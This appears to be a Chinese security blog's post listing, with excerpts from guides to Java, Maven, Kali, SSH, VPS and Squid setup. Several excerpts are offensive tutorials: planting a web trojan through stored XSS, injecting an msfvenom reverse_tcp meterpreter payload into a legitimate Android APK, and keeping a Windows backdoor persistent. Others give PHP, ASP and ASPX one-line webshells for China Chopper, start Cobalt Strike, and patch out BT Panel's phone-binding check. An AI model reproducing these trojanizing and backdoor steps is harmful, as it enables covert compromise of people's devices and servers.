- 博客(30)
- 收藏
- 关注
RSS订阅原创 XSS漏洞,通过XSS实现网页挂马
首先我们的目标是一个存在存储型 XSS 漏洞的网页,看过我前面文章的小伙伴们应该知道,DVWA 平台上就有专门给我们练习存储型 XSS 漏洞的页面,我们就通过这个网页来实践挂马。2、将木马服务器的URL,插入到一个存在存储型XSS漏洞的正常web服务器中,一旦有人访问该服务器的挂马页面,而且该用户存在MS14_064漏洞,就会中招。攻击载荷模块(payload),目标系统被成功渗透后执行的代码,payload 中的主要内容包括 shellcode,一段获取 shell 的代码。
2023-02-11 18:36:36
2431
1
原创 几步搞懂cobalt strike启动
很多人问Cobalt strike怎么启动,总结几句1.cmd管理员身份运2.切换到CS所在目录3.输入ipconf找到自己ip地址4.输入teamserver 自己ip 密码 回车即可5.打开start.bat文件再点击确定即可打开即可使用cobalt strike...
2022-06-20 23:53:17
1769
原创 Android payload注入
参考了网络很多大神文章,简单小结一下,仅供参考1,msfvenom -p android/meterpreter/reverse_tcp LHOST=本机IP LPORT=监听端口号 -o virus.apk2,apktook反编译virus.apk和normal.apk3,找normal.apk入口,normal.apk的androidManifest.xml文件中查找MainActivety和Launch关键词,4,找到com/xxx/xxx/MainActivety.smail文件并搜索on
2021-11-22 22:51:35
866
原创 squid代理教程
1,vps安全组开放端口规则2,yum install squid -y3,yum install httpd-tools -y4,cd /etc/squid5,htpasswd -c /etc/squid/passwd 设置的账号,回车输密码后,会生成/etc/squid/passwd文件6,vi etc/squid/squid.confhttp_port 57000via offforwarded_for deleteauth_param basic program /usr/lib
2021-11-22 22:51:00
821
原创 VPS初始化设置
一、创建普通管理员账户创建普通用户这里我们使用 adduser 命令创建一个名为 herald 的用户,执行命令后,系统会交互询问密码、全名等一系列问题,除密码外,其他信息都可不填。实际的用户名请按需修改#adduser herald将用户添加到 sudo 用户组使用 usermod 命令,附加 -aG 参数,将用户 herald 添加到 sudo 用户组。#usermod -aG sudo herald-aG 参数可以在保持用户原有用户组设置的前提下,将用户追加到指定的用户组。
2021-11-22 22:49:26
1731
原创 windows/android后门的维持
搭建环境:kali linux,MSFwindons后门维持// 先创建一个后门payloadmsfvenom -p windows/meterpreter/reverse_tcp LHOST=<your ip> LPORT=4444 -f exe > /root/Desktop/windowsPayload.exe// 打开msf控制台,并完成相关设置msfconsoleuse exploit/multi/handlerset payload windows/meterpr
2021-08-09 22:39:24
666
原创 beef +metasploit关联
参考了网络很多大神文章,简单小结一下,仅供参考1,配置beef的vim /usr/share/beef-xss/config.yaml,修改此文件metasploit配置为 enable:true2,配置vim /usr/share/beef-xss/extensions/metasploit/config.yaml,修改此文件配置两处ip为kali自身ip3,首次启动msf,先启动postgresql数据库服务service postgresql restart,再启动msfconsole4,ms
2021-07-24 10:30:24
430
原创 APK TOOL配置教程
首先下载apktool.jar并放到apktool文件夹需要反编译demo.apk放在apktool的相同文件夹内cmd命令行进入apk.jar所在文件路径APK反编译:java -jar apktool.jar d -f D:\Tools\apktool\demo.apk修改完成后进行APK回编译:java -jar apktool.jar b D:\Tools\apktool\demo回编译生成的apk文件在…\dist目录下(可以搜索.apk),找到回编译的apk后下一步就需要签名了cmd
2021-07-24 10:28:15
1613
原创 解除宝塔面板强制绑定手机号教程
通过ssh连接服务器连接成功后输入以下命令:执行命令 vi /www/server/panel/BTPanel/static/js/index.js然后按下 i编辑 ,找到代码“if (bind_user == ‘True’) {show_force_bind();}”删除后按 esc 然后输入 : wq强制写入退出 然后回车浏览器刷新缓存后弹窗没了...
2021-07-24 10:25:26
1996
原创 VPS安装Linux系统_虚拟机方式
1,官网下载Linux镜像2,查看VPS厂商支持的镜像格式,//RAW格式|QCOW2格式,VHD格式,VMDK格式3,VirtualBox创建虚拟机并记录存放虚拟机安装路径,创建对应的虚拟硬盘文件类型 //虚拟硬盘文件类型一般有VHD格式,VMDK格式4,设置好网络类型和选择导入Linux.iso文件,安装完毕后记住用户名和密码并更新软件再开启ssh5,到虚拟机安装路径会多一个后缀为VHD硬盘文件6,来到VPS控制台,点击对象存储–存储桶列表–新建存储桶–上传VHD硬盘文件–上传成功后点击详
2021-07-24 10:23:38
504
原创 Kali Linux更新源和软件教程
1,vi /etc/apt/sources.list //kali更新源文件–添加更新源地址并保存–不使用的源地址可注释掉2,apt-get update //更新软件源中的软件列表3,apt-get upgrade //更新已经安装的软件包本身,不处理依赖关系改变的软件包4,apt-get dist-upgrade //更新完成后再次输入软件升级,处理依赖关系改变的软件包5,apt-get clean //更新完成后清除更新过程中下载并解压的安装包,因为包安装后就没有用了6,reboo
2021-07-24 10:22:13
1546
原创 SSH&ProxyChains配置教程
debian&ubuntu SSH配置vi /etc/ssh/sshd_config //SSH代理服务端配置Port 22 监听端口 //PermitRootLogin yes //登陆打开PasswordAuthentication yes //允许密码service ssh restart //启动服务netstat -pantu | grep :22 netstat -antp | grep sshd // 查看22端口是否启动
2021-07-24 10:18:14
507
原创 JDK环境变量配置
1,搜索引擎搜索对应"jdk"下载-安装2,java安装目录右键-属性-安全-编辑权限 //不然会报错3,电脑–属性–高级系统设置–高级–环境变量–新建系统变量名,变量值–添加到pathJAVA_HOME C:\Program Files\Java\jdk-11CLASSPATH .;%JAVA_HOME%\lib\dt.jar;%JAVA_HOME%\lib\tools.jar;path ;%JAVA_HOME%\bin;%JAVA_
2021-07-24 10:13:56
145
原创 SSH&ProxyChains配置教程
debian和ubuntu SSH配置vi /etc/ssh/sshd_config //SSH代理服务端配置Port 22 监听端口 //PermitRootLogin yes //登陆打开PasswordAuthentication yes //允许密码service ssh restart //启动服务netstat -pantu | grep :22 netstat -antp | grep sshd // 查看22端口是否启动s.
2021-07-24 10:09:29
289
原创 Squid代理
1,yum install squid -y //安装suid2,yum install httpd-tools -y //安装工具3,cd /etc/squid/ //进入目录4,ls //显示列表5,mv squid.conf suid.conf.bak //备份6,vi squid.conf //编辑配置文件并添加代码http_port 57000http_access allow allvia offforwarded_for delete7,syste
2021-07-24 09:43:57
315
原创 目录遍历漏洞
0x001 漏洞简介目录遍历(路径遍历)是由于web服务器或者web应用程序对用户输入的文件名称的安全性验证不足而导致的一种安全漏洞,使得攻击者通过利用一些特殊字符就可以绕过服务器的安全限制,访问任意的文件(可以使web根目录以外的文件),甚至执行系统命令。0x002 漏洞原理目录遍历漏洞原理比较简单,就是程序在实现上没有充分过滤用户输入的…/之类的目录跳转符,导致恶意用户可以通过提交目录跳转来遍历服务器上的任意文件。这里的目录跳转符可以是…/,也可是…/的ASCII编码或者是unicode编码等。
2021-07-18 22:09:15
910
2
原创 中国菜刀
中国菜刀工具是一款专业的网站管理软件,用途广泛,使用方便,小巧实用。只要支持动态脚本的网站,都可以用中国菜刀来进行管理一句话木马就是一句简单的脚本语言,常见脚本语言的一句话木马如下:php:<?php @eval($_post['pass']);?>asp:<%eval request ("pass")%>aspx:<%@ Page Language="Jscript"%> <%eval(Request.Item["pass"],"unsafe");
2020-06-22 22:21:26
1413
原创 Kali Linux 更新源和启动ssh服务
Kali Linux是一个高级渗透测试和安全审计Linux发行版。作为使用者,我简单的把它理解为,一个特殊的Linux发行版,集成了精心挑选的渗透测试和安全审计的工具,供渗透测试和安全设计人员使用。也可称之为平台或者框架关于系统特性,定制,在不同设备上的安装,请在Kali Linux官网上查阅,http://www.kali.org/添加Kali更新源 /etc/apt/sources.list启动ssh服务 1、修改sshd_config文件,命令为:vi /etc...
2020-06-22 22:14:34
414
原创 陀螺世界教程
今天给大家录制一期陀螺世界游戏app源码养牛广告收益分红模式以及搭建详细视频教程安装说明为下列环境是apache2.4 +mysql5.6以上 (必须要这个环境 本人测试NG 是无法运行的 )php7.3版本 ( 4g4h5m 这是最基本的配置 低了带不起来 )导入数据修改数据库配置文件: (这里已经提前上传了 自己上传 这些都不需要讲)config/database.php (修改数...
2020-02-28 11:41:26
727
2
原创 幽冥传奇
JAVA环境添加setx /M JAVA_HOME “D:\YM-cnmmm.com\bl20166\Java\jdk1.8.0_144”setx /M CLASSPATH “.;%%JAVA_HOME%%\lib\dt.jar;%%JAVA_HOME%%\lib\tools.jar”setx /M PATH “%PATH%;%%JAVA_HOME%%\bin”游戏解压到D盘:D:\YM...
2020-01-16 09:48:31
2167
原创 linux¢os基本命令
centos基本命令#---------------------------#CentOS Windows##>ls cmd>dir //##>ls --help //查看命令帮助##>man ls //查看命令帮助###>clear cmd>cls //清屏##>...
2020-01-04 21:26:59
245
原创 域名服务的工作流程
## 域名服务的工作流程比如我们向www.baidu.com发出请求, 执行流程则是:1,C:\Windows\System32\drivers\etc \hosts文件中去寻找域名和ip映射信息1.1,如果本地hosts文域名件中没有该域名ip信息,就会向外部DNS服务器查询2,如果从DNS拿到域名和IP信息,就会向WEB服务器发出真实请求,如下图...
2020-01-03 12:09:39
364
原创 HTML和CSS归档基础知识
## HTML和CSS归档基础知识前端好久没看找了资料归档了下,HTML和CSS基本东西,深入请下载***w3cschool.CHM***0,form表单格式案例0,<!-- form表单 form:用户输入数据,它采集用户数据 * action:指定提交的URL ...
2020-01-03 09:51:52
322
原创 JAVA环境变量配置教程(window和Linux)
**windows/Linux系统Java环境变量设置**1,java官方下载地址2,打开电脑-高级环境变量-高级-环境变量-新建,变量=JAVA_HOME,变量值=C:\Program Files\Java\jdk1.8.0_162(自己路径)3,打开电脑-高级环境变量-高级-环境变量-新建,变量=CLASSPATH,变量值= .;%JAV...
2020-01-02 13:24:04
367
原创 Maven环境配置和本地仓库和远程仓库配置及常用命令
1,从官网下载maven,下载地址2,解压后文件,知道自己路径,如我的D:\ALLTOOLS\maven3,打开控制面板\所有控制面板项\系统\高级系统设置\环境变量\系统变量,新建变量为MAVEN_HOME,变量值为D:\ALLTOOLS\Maven4,环境配置好后,测试下,打开cmd,输入mvn -v,出现maven信息后配置成功5,我们打开maven目录,找到settings...
2020-01-02 11:22:58
1023
原创 Tomcat 安装环境变量配置
1,打开Tomcat文件夹路径java环境变量配置教程_链接地址2,按windows+E按键3,按windows+R按键,运行框输入control4,找到系统选项5,点击高级系统设置6,找到环境变量并且点开7,点击新建系统变量8,输入变量名CATALINA_HOME和变量值D:\ALLTOOLS\apache-tomcat-...
2019-12-31 11:26:28
501
原创 宝塔忘记端口,解决办法
1,登陆远程连接,输入ll2,输入cd后再ll3,清下屏,输入clear4,输入cd www/server/panel/data,找到port.pl5,输入cat port.pl查看端口,通过vi修改端口6,也可输入netstat -ntpl看监听端口7,修改端口后按下shift+:再加wq(写入退出)8,远程开启端口,输入vi /etc/...
2019-12-29 15:10:26
4603
原创 颂游搭建教程
1,伪静态规则:location /qp_host/ { if (!-e $request_filename){ rewrite ^/qp_host/(.*)$ /qp_host/index.php?s=$1 last; }} location /qp_ht/ { if (!-e $request_filena...
2019-12-29 14:04:00
1294
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人